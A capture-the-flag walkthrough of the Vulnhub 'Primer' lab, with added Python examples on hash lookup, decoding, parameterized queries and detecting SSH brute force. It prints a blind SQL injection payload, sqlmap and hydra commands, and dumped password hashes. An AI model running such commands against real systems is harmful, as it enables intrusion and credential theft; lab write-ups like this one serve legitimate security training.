Teach some basic well known techniques and attacks. Spark some curiosity, make the user look at the source code and try to figure out what’s going on behind the scenes. The main goal is to give a nice welcoming intro to the scene and hopefully also teach something about ethics and responsibility.
I know the description says there will be a web server running and that I probably never have to leave the browser, but it never hurts to look. So, as always, I start with an nmap scan.
Nmap scan report for 192.168.110.2
Host is up (0.00033s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
52581/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:A6:48:9A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Besides port 80, ports 22, 111 and 52581 are also open. Maybe I'll never need them, but it's always good to know what's out there. Like a good boy, I'll check the web server out first.
When I point my browser at the website there is a piece of text telling a story. I also notice I'll need a username and password to proceed. When I check the source code, there is a piece of text that gives away a clue on how to proceed.
Some f0rms are easier than others.
This one was just a means to get to the next level so there was no need for her to apply her full set of skills or fake credentials. Manufacturing a bo0le4n response would probably be enaugh to let her pass.
In the meantime I let dirb brute-force the directories, and it came back with some useful information.
Looks like there is a robots.txt file and a phpmyadmin installation.
When I check the robots.txt file, it points to another page with more of the story.
The title of the story looks like a fork bomb.
The rabbit hole got deeper
On the page there is a link to yet another page with a part of the story. This page is also titled [FORK]. On the page there is a reference to another node, and again it's an odd-looking string. It looks like an md5 hash. When I crack the hash, the result is the number 13. When I check the previous 2 strings I get the numbers 7 and 11.
[4_8f14e45fceea167a5a36dedd4bea2543] –> [4_7]
[5_6512bd43d9caa6e02c990b0a82652dca] –> [5_11]
[6_c51ce410c124a10e0db5e4b97fc2af39] –> [6_13]
When I follow this link, I get another login mechanism. Cancelling this popup results in a warning.
When I check the source code of the page with the login pop-up, I get another part of the story and another lead to follow.
[7_70efdf2ec9b086079795c442636b55fb] –> [7_17]
When I check out the source code of the page with the red warning, there is nothing useful other than the 6 SHA256 hashes that are already shown on the page itself. I tried to crack the hashes, but I guess I don’t have the proper wordlist. On the net they’re also unknown. So I’ll follow the found clue and see where it leads.
/*”Someone didn’t bother reading my carefully prepared memo on commonly-used passwords. Now, then, as I so meticulously pointed out, the four most-used passwords are: love, sex, secret, and…” – The Plague*/
When I decoded the hex into readable text and removed the '?' characters with sed, I got another hash, plus the real name of the girl in the story: 'Nieve'. When I crack the hash, I get 'GOD'.
Returning to the piece of text signed by 'The Plague', the missing word is 'god' (as found in the hash). After dropping something random into the input field of the login pop-up on this page, I get redirected to another page.
Again the red text and the hashes. Unfortunately I couldn't crack these hashes either, nor were they known hashes. I also couldn't find anything in the source code. It feels like I've reached the end of the rabbit hole. With the newly found password in hand, I return to the very first login pop-up.
Through the looking glass
After I arrived on the page with the first login pop-up I entered ‘GOD’. Not what I hoped for. So on to the second one.
Bummer… it results in the page I already read after decoding the hex.
I ran sqlmap against the phpmyadmin page I had found, but to no avail. Because I was getting stuck, I looked over what I had found but hadn't finished: the md5 hashes as pages. Those should mean something… anything hahaha (sounding desperate). After listing them and breaking my head over them, there was a logic in the numbers. The left column went up by one (sequential), while the differences in the right column repeated (4, 2, 4). Logically the next difference would be 2, and adding 2 to 17 gives 19. When I check on Google it seems I'm dealing with primes here (well, isn't that a coincidence? This challenge is also named 'primer' 🙂).
Because all the strings were hashed, this one will need to be hashed too. I hash the string with md5.
[8_19] –> [8_1f0e3dad99908345f7439f8ffabdffc4]
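As an added illustration (not part of the original writeup or the challenge), the Python below does what the guessing above did by hand: it builds a lookup table of md5 over small integers, resolves every N_&lt;hash&gt; node from this page against it, checks that the recovered values are primes, and predicts the next node. The node names are the ones shown on this page; the 10_ entry, which contains non-hex characters, is included to show that a malformed digest simply never matches. The defensive point is that an unsalted hash of a low-entropy value is a lookup key, not a secret.

```python
import hashlib

# Node names as they appear on this page (the N_<md5> links and the later
# directory listing). "10_..." contains non-hex characters and cannot be a
# real md5 digest, so no enumeration will ever resolve it.
PAGE_NODES = [
    "1_c81e728d9d4c2f636f067f89cc14862c",
    "2_eccbc87e4b5ce2fe28308fd9f2a7baf3",
    "3_e4da3b7fbbce2345d7772b0674a318d5",
    "4_8f14e45fceea167a5a36dedd4bea2543",
    "5_6512bd43d9caa6e02c990b0a82652dca",
    "6_c51ce410c124a10e0db5e4b97fc2af39",
    "7_70efdf2ec9b086079795c442636b55fb",
    "8_1f0e3dad99908345f7439f8ffabdffc4",
    "9_37693cfc748049e45d87b8c7d8b9aacd",
    "10_23693cff748o49r45d77b6c7d1b9afcd",
]


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def build_small_int_table(limit: int = 10_000) -> dict:
    """md5(str(n)) -> n for 0 <= n < limit. Ten thousand hashes take a few
    milliseconds, which is the whole point: a tiny input space is enumerable."""
    return {md5_hex(str(n)): n for n in range(limit)}


def resolve_nodes(nodes, table):
    """Map node index -> recovered integer (None when the digest is unknown)."""
    resolved = {}
    for node in nodes:
        idx, _, digest = node.partition("_")
        resolved[int(idx)] = table.get(digest.lower())
    return resolved


def is_prime(n: int) -> bool:
    if n < 2:
        return False
    return all(n % d for d in range(2, int(n ** 0.5) + 1))


def next_prime_node(resolved):
    """Predict the following node: the next prime after the largest recovered
    value, hashed the same way and numbered one past the highest index."""
    known = [v for v in resolved.values() if v is not None]
    if not known or not all(is_prime(v) for v in known):
        raise ValueError("recovered values are not all primes; pattern does not hold")
    candidate = max(known) + 1
    while not is_prime(candidate):
        candidate += 1
    return candidate, f"{max(resolved) + 1}_{md5_hex(str(candidate))}"


if __name__ == "__main__":
    table = build_small_int_table()
    for idx, value in sorted(resolve_nodes(PAGE_NODES, table).items()):
        print(idx, value)
    # Using only nodes 4..7, as the writeup did, the prediction is node 8.
    print(next_prime_node(resolve_nodes(PAGE_NODES[3:7], table)))
```

Run it and every node except 10_ resolves to a prime; feeding it only nodes 4 to 7 yields exactly the 8_ name used above.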
At the bottom there is a link. When following that link I arrive on a page with a kind of ‘terminal’. When typing ‘help’, I get a view of the options that are presented to me.
When I return to the terminal I list all the running processes.
USER  PID   CPU MEM  COMMAND
root  3793  4.0 3.4  connect falken@Erebus
root  2005  1.1 71.0 c0re -t Chaos
nieve 29529 0.8 1.3  ps
Am I nieve? hahahahaha
Looks like user root is connected to falken@Erebus. In the /usr/ folder there are several users. There are 2 users with readable logs, willis and falken. Looking in the /bin/ folder there is a program called 'date'. When I run it, it tells me the date right now is Tuesday 6th of July 2032 02:22:05 PM. The logs from willis and falken were created in July and August 2028.
According to /etc/network/ there are 3 connections running. I can look into eth0 and eth1, but with eth2 I get access denied.
When I try to connect to falken@Erebus I need a password. After reading falken's logs, it's likely that the password consists of the name Joshua and his birth year. Since the date of the log is 06-08-2028 and Joshua's age is 44, he must have been born in 1984. After several tries, it seems that joshua1984 is the correct one.
After a very short LSD trip, I found myself on a page with a terminal again. When I check falken's usr folder I find 2 logfiles which I can read. They look base64 encoded, and with the decode option I can finally read them.
9th of August 2028 I have joined the network from home and connected to the Erebus server. I will continue my work from here but I will have to be more careful. Now, Erebus was the second AI installed after Chaos. I wasn’t part of the team but most of the members were my friends, so I know my way around here.
10th of August 2028 Ok, the problem I have with the Chaos c0re is that its source is shifting too fast. Every time I execute a small part it breaks down or begins to morph and grow in order to replicate functions of different parts. The signaling is also going crazy even on segments that are relatively stable. Signaling to disconnected parts! And reactions to responses that would have but definitely have not been sent… Am I going crazy or is Chaos experiencing phantom pain?
The other 2 raise some questions. When I try to open them, the system freezes up. There has to be a way to read them. In the last part the logs were plain text; now some are encoded. Seeing that I have more options besides base64, I think it's time to try them all.
After fumbling with those 2 logs, it comes to my attention that 'decode gz' is the option to proceed. With the last log the output is gibberish. Because the letters are grouped in a way that looks like a sentence, I suspect some kind of rotation. Luckily there is also an option for decoding rot13. When I copy the string and decode it with rot13, there is a mention of 'TrivialZ3r0'.
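The "try them all" approach above is what analysts do when a log, a dropper or a config comes wrapped in several layers. The Python below is an added example, not code from the writeup or the challenge: it peels base64, gzip and rot13 (the three decode options the terminal offered) in whatever order they were applied, stopping when the payload looks like English. The sample log line and its layering are constructed here; the readability heuristic is an assumption of the example and deliberately demands spaces plus a couple of common words, so neither base64 text nor rot13 text passes for plaintext.

```python
import base64
import binascii
import codecs
import gzip
import re

# Constructed plaintext in the style of the in-game logs; not content from
# the challenge itself.
SAMPLE_LOG = ("11th of August 2028 The Erebus node is signaling to parts that "
              "have been disconnected from the c0re. I will have to look at "
              "this from TrivialZ3r0.")


def build_sample() -> bytes:
    """Wrap the plaintext in rot13, then gzip, then base64 (innermost first)."""
    rotated = codecs.encode(SAMPLE_LOG, "rot_13").encode("ascii")
    return base64.b64encode(gzip.compress(rotated, mtime=0))


def try_gzip(data: bytes):
    if not data.startswith(b"\x1f\x8b"):  # gzip magic bytes
        return None
    try:
        return gzip.decompress(data)
    except (OSError, EOFError):
        return None


def try_base64(data: bytes):
    # validate=True rejects anything outside the base64 alphabet, so prose
    # with spaces or punctuation is never mistaken for base64.
    try:
        return base64.b64decode(data.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None


def try_rot13(data: bytes):
    try:
        return codecs.decode(data.decode("ascii"), "rot_13").encode("ascii")
    except UnicodeDecodeError:
        return None


COMMON_WORDS = re.compile(r"\b(the|and|have|from|to|is|of)\b")


def looks_readable(data: bytes) -> bool:
    """Stop condition: ASCII, mostly printable, contains spaces and at least
    two common English words. rot13 output keeps the spaces but loses the
    words; base64 output has no spaces at all."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    if not text:
        return False
    printable = sum(c.isprintable() or c.isspace() for c in text) / len(text)
    spaces = text.count(" ") / len(text)
    return printable > 0.95 and spaces > 0.05 and len(COMMON_WORDS.findall(text.lower())) >= 2


# Cheapest and most specific checks first; rot13 is last because it always
# "succeeds" on ASCII input.
DECODERS = (("gzip", try_gzip), ("base64", try_base64), ("rot13", try_rot13))


def peel(data: bytes, max_layers: int = 6):
    """Strip encoding layers until the payload looks readable.
    Returns (payload, [layer names applied, outermost first])."""
    layers = []
    current = data
    for _ in range(max_layers):
        if looks_readable(current):
            break
        for name, fn in DECODERS:
            out = fn(current)
            if out is not None and out != current:
                current = out
                layers.append(name)
                break
        else:
            break  # no decoder applied; stop instead of looping forever
    return current, layers


if __name__ == "__main__":
    payload, applied = peel(build_sample())
    print(applied, payload.decode())
```

The gzip check is the only one that keys on a magic number; base64 is recognised by strict alphabet validation and rot13 by elimination, which is why the order in DECODERS matters.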
When I check the running processes it looks like the good falken is connected to this TrivialZ3r0.
USER  PID   CPU  MEM  COMMAND
root  3251  8.7  4.0  connect falken@TrivialZ3r0
root  2677  49.7 48.8 c0re -t Erebus
nieve 84687 1.0  0.9  ps
When I ask Google what TrivialZ3r0 might be, I get a hit on a mathematical hypothesis, the 'Riemann hypothesis'. Too bad I can't feed a list of the found data to hydra to get my way in. So I make a list by hand and sort out what is completely useless and what would make sense as a password.
After a long time trying different words, it seems that 'riemann' was the correct one. After a small video sequence I arrive at TrivialZ3r0. Same surroundings, same routine. But in this case there is a /passwd/ folder with 3 hashes in it.
falken: 61ea1974dd974297913b1fa2f0470d26 –> Riemann
chaos: 85241de03d1254ac40274b02caafcd99 –> 2.718281828459045
mccarthy: f74bfa0e35e5089a0bb743a893b4c7e3 –> m4xw*311#
After checking the running processes again, I connect to ‘Wintermute’ with the found password for ‘chaos’.
Again a small video sequence and I can see that ‘nieve’ has found the end of the road. There is a file called ‘nieve’ and when reading the content of the file there are some credentials for nieve if she wants to join the ‘hive mind’ and enter ‘Zephis’.
When I connect with Zephis, I get the rolling credits.
Most boot2roots revolve around pwning the system and acquiring root privileges. This one was more focused on doing everything inside the browser. But there is another way in.
I figured I hadn't tried sqlmap on the primary page yet, which looked like a good idea now. After grabbing the HTTP request header I fed it to sqlmap and let it rip.
root@kali:~/Documents/ctf/Primer1# sqlmap -r header2.txt --dbms=mysql --level=5 --risk=3 --current-db
..
sqlmap identified the following injection point(s) with a total of 2733 HTTP(s) requests:
---
Parameter: usr (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: usr=test'||(SELECT 'xXKx' FROM DUAL WHERE 7283=7283 AND SLEEP(5))||'&pw=123&commit=Login
---
[15:25:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
..
[15:26:19] [INFO] adjusting time delay to 1 second due to good response times
test
current database: 'test'
[15:26:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.110.2'
..
Database: test
[1 table]
+-------+
| users |
+-------+
..
[15:35:48] [INFO] analyzing table dump for possible password hashes
Database: test
Table: users
[1 entry]
+----+----+-----+---------+
| ID | pw | usr | text    |
+----+----+-----+---------+
| 1  | pw | usr | <blank> |
+----+----+-----+---------+
..
This current database is really useless. Let's try once more, but now I'm aiming for the other databases.
root@kali:~/Documents/ctf/Primer1# sqlmap -r header2.txt --dbms=mysql --level=5 --risk=3 --dbs
..
available databases :
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
..
Database: phpmyadmin
Table: pma__users
[0 entries]
+----------+-----------+
| username | usergroup |
+----------+-----------+
+----------+-----------+
..
After I noticed that the phpmyadmin database was empty, I hoped that the mysql database was more promising and not another troll.
Database: mysql
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+
..
Database: mysql
Table: user
[7 entries]
+------------------+-------------------------------------------+
| User             | Password                                  |
+------------------+-------------------------------------------+
| backdoor         | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 |
| debian-sys-maint | *0A799FB65F1A7F8E0B0F9C7CBE0983029BDF3D63 |
| phpmyadmin       | *EDDB5D9F648E137B72DC65A9904FBFC9FC4A4C25 |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
+------------------+-------------------------------------------+
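The injection point sqlmap reported above (the usr POST parameter, payload shaped as '...'||(SELECT ...)||') exists because the login query is built by string concatenation. The Python below is an added example, not the challenge's login.php, which is never shown on this page. It rebuilds the tiny 'test' database from the dump in SQLite (so the example runs anywhere; DUAL and SLEEP are MySQL-specific and left out), puts the concatenating login next to a parameterized one, and shows that only the concatenating version lets an expression inside the parameter change the query's outcome. The row's real password is used in the demo purely so the outcome is visible; in the blind case above, sqlmap used response time as the channel instead.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the 'test' database in the dump above: one
    table 'users' holding the single row (ID=1, pw='pw', usr='usr')."""
    con = sqlite3.connect(":memory:")
    con.execute('CREATE TABLE users (ID INTEGER PRIMARY KEY, pw TEXT, usr TEXT, "text" TEXT)')
    con.execute("INSERT INTO users VALUES (1, 'pw', 'usr', '')")
    con.commit()
    return con


def login_vulnerable(con: sqlite3.Connection, usr: str, pw: str) -> bool:
    """The POST parameters are spliced into the SQL text, so whatever the
    client sends is parsed as SQL. This is the shape sqlmap found above."""
    sql = f"SELECT ID FROM users WHERE usr='{usr}' AND pw='{pw}'"
    return con.execute(sql).fetchone() is not None


def login_parameterized(con: sqlite3.Connection, usr: str, pw: str) -> bool:
    """Bound parameters: the driver passes usr and pw as values, never as SQL,
    so quotes and operators inside them have no syntactic effect."""
    sql = "SELECT ID FROM users WHERE usr=? AND pw=?"
    return con.execute(sql, (usr, pw)).fetchone() is not None


# Two constructed inputs in the shape of sqlmap's payload, SQLite flavoured:
# the embedded condition is true in the first and false in the second.
# In the vulnerable query 'usr'||''||'' equals 'usr' when the condition
# holds, and 'usr'||NULL||'' is NULL when it does not.
INJECT_TRUE = "usr'||(SELECT '' WHERE 7283=7283)||'"
INJECT_FALSE = "usr'||(SELECT '' WHERE 7283=7284)||'"


def oracle_visible(login_fn) -> bool:
    """True when the login outcome depends on the condition embedded in the
    parameter, i.e. the handler acts as a yes/no oracle on database state.
    That oracle is what blind injection (and sqlmap's SLEEP probe) relies on."""
    con = make_db()
    return login_fn(con, INJECT_TRUE, "pw") != login_fn(con, INJECT_FALSE, "pw")


if __name__ == "__main__":
    for name, fn in (("concatenated", login_vulnerable), ("parameterized", login_parameterized)):
        print(f"{name}: oracle visible = {oracle_visible(fn)}")
```

Both handlers accept the genuine credentials; only the concatenating one treats the parameter as SQL, which is the whole difference the fix has to make.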
After cracking the hash it seems that the password for root is 'PRIMER'. The other hashes aren't known and I left them alone instead of wasting time on pure brute forcing.
I have collected a lot of data along the way and put it all in a list. I figure it's worth trying this list against port 22.
hydra -s 22 -v -L /root/Documents/ctf/Primer1/primer.dic -P /root/Documents/ctf/Primer1/primer.dic -t 10 192.168.110.2 ssh
It turns out to be the same password as the root user in the MySQL database.
root@kali:~/Documents/ctf/Primer1# ssh email@example.com -p 22
firstname.lastname@example.org's password:
Permission denied, please try again.
email@example.com's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Sep  1 17:23:29 2016 from 192.168.110.3
nieve@PRIMER:~$
nieve@PRIMER:~/PRIMER$ ls -lah
total 68K
drwxr-xr-x 12 nieve nieve 4.0K Oct 25  2015 .
drwxr-xr-x  3 nieve nieve 4.0K Oct 25  2015 ..
drwxr-xr-x  2 nieve nieve 4.0K Oct 25  2015 10_23693cff748o49r45d77b6c7d1b9afcd
drwxr-xr-x  2 nieve nieve 4.0K Oct 25  2015 1_c81e728d9d4c2f636f067f89cc14862c
drwxr-xr-x  2 nieve nieve 4.0K Oct 25  2015 2_eccbc87e4b5ce2fe28308fd9f2a7baf3
drwxr-xr-x  2 nieve nieve 4.0K Oct 25  2015 3_e4da3b7fbbce2345d7772b0674a318d5
drwxr-xr-x  2 nieve nieve 4.0K Oct 25  2015 4_8f14e45fceea167a5a36dedd4bea2543
drwxr-xr-x  2 nieve nieve 4.0K Oct 25  2015 5_6512bd43d9caa6e02c990b0a82652dca
drwxr-xr-x  2 nieve nieve 4.0K Oct 25  2015 6_c51ce410c124a10e0db5e4b97fc2af39
drwxr-xr-x  2 nieve nieve 4.0K Oct 25  2015 7_70efdf2ec9b086079795c442636b55fb
drwxr-xr-x  2 nieve nieve 4.0K Oct 25  2015 8_1f0e3dad99908345f7439f8ffabdffc4
drwxr-xr-x  2 nieve nieve 4.0K Oct 25  2015 9_37693cfc748049e45d87b8c7d8b9aacd
-rw-r--r--  1 nieve nieve 5.8K Oct 25  2015 index.html
-rw-r--r--  1 nieve nieve 1.3K Oct 25  2015 localhost.sql
-rw-r--r--  1 nieve nieve  443 Oct 25  2015 login.php
-rw-r--r--  1 nieve nieve   59 Oct 25  2015 robots.txt
After looking around the system as nieve, I didn't find anything that could really elevate my privileges. So I switched to root with the same password as nieve.
nieve@PRIMER:~$ su root
Password:
root@PRIMER:/home/nieve# id
uid=0(root) gid=0(root) groups=0(root)
root@PRIMER:/home/nieve# cd /root
root@PRIMER:~# ls -lah
total 20K
drwx------  2 root root 4.0K Oct 25  2015 .
drwxr-xr-x 21 root root 4.0K Oct 25  2015 ..
-rw-------  1 root root 2.5K Jan  3  2016 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
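Seen from the machine's side, the last three steps (a hydra run against sshd, a successful login right after it, and an su to root with a reused password) leave a very recognisable trail in auth.log. The Python below is an added example, not anything from the writeup or the challenge: it parses constructed Debian-style sshd and su lines and raises three findings, a burst of failures from one source within a time window, a successful login from a source that was just failing, and the interactive switch to root. The host name and source address echo the session above, but the log lines themselves are made up, and the year is assumed because syslog timestamps do not carry one.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed OpenSSH and su log lines in Debian auth.log style; not taken
# from the target machine.
SAMPLE_AUTH_LOG = """\
Sep  1 17:22:01 PRIMER sshd[2011]: Failed password for invalid user admin from 192.168.110.3 port 40112 ssh2
Sep  1 17:22:02 PRIMER sshd[2013]: Failed password for nieve from 192.168.110.3 port 40114 ssh2
Sep  1 17:22:03 PRIMER sshd[2015]: Failed password for nieve from 192.168.110.3 port 40116 ssh2
Sep  1 17:22:04 PRIMER sshd[2017]: Failed password for root from 192.168.110.3 port 40118 ssh2
Sep  1 17:22:05 PRIMER sshd[2019]: Failed password for nieve from 192.168.110.3 port 40120 ssh2
Sep  1 17:22:06 PRIMER sshd[2021]: Failed password for nieve from 192.168.110.3 port 40122 ssh2
Sep  1 17:23:29 PRIMER sshd[2090]: Accepted password for nieve from 192.168.110.3 port 40190 ssh2
Sep  1 17:23:40 PRIMER su: (to root) nieve on /dev/pts/0
"""

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
SU_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ su(?:\[\d+\])?: "
    r"\(to (?P<target>\w+)\) (?P<user>\w+) on"
)
ASSUMED_YEAR = 2016  # syslog timestamps omit the year; assumption for the demo


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(f"{ASSUMED_YEAR} {ts}", "%Y %b %d %H:%M:%S")


def detect(log_text: str, threshold: int = 5, window_seconds: int = 60):
    """Walk the log once and return findings as tuples:
      ("bruteforce", ip, ts)                         threshold failures from ip inside the window
      ("success_after_failures", ip, user, n_failed) a login from a source that was just failing
      ("su", user, target)                           interactive privilege change
    """
    failures = defaultdict(list)  # source ip -> timestamps of failed logins
    findings = []
    for line in log_text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            ts, ip = parse_ts(m["ts"]), m["ip"]
            if m["result"] == "Failed":
                failures[ip].append(ts)
                recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
                if len(recent) == threshold:  # fire when the count reaches the threshold
                    findings.append(("bruteforce", ip, ts))
            elif failures[ip]:
                findings.append(("success_after_failures", ip, m["user"], len(failures[ip])))
            continue
        m = SU_RE.match(line)
        if m:
            findings.append(("su", m["user"], m["target"]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_AUTH_LOG):
        print(finding)
```

A threshold of five failures in a minute is a demo value; what matters operationally is the second finding, a success from the same source right after the burst, which is the signal that a guessed or reused password actually worked.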
Unfortunately the /root/ folder was empty, so this journey ends here.
It was a fun challenge and a great story to follow. Because I like the themed challenges, I’ll look for more. Thanks to the author for taking the time to build it and thanks to Vulnhub for hosting it.